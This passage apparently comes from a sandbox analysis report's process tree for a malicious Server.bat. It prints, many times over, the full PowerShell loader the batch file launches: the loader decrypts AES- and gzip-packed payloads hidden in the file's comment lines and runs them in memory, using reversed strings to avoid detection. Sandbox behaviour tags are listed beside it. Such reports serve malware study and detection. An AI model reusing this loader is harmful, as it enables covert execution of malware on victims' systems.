        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        35⤵
        
        PID:2528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        36⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:300
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        34⤵
        
        PID:2996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        35⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:324
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        33⤵
        
        PID:1016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        34⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2168
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        32⤵
        
        PID:2408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        33⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2392
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        31⤵
        
        PID:2780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        32⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2032
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        30⤵
        
        PID:2460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        31⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:624
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        29⤵
        
        PID:2428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        30⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2972
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        28⤵
        
        PID:2880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        29⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2548
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        27⤵
        
        PID:3060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        28⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1612
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        26⤵
        
        PID:2152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        27⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1484
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        25⤵
        
        PID:1144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        26⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1712
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        24⤵
        
        PID:1640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        25⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1948
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        23⤵
        
        PID:1304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
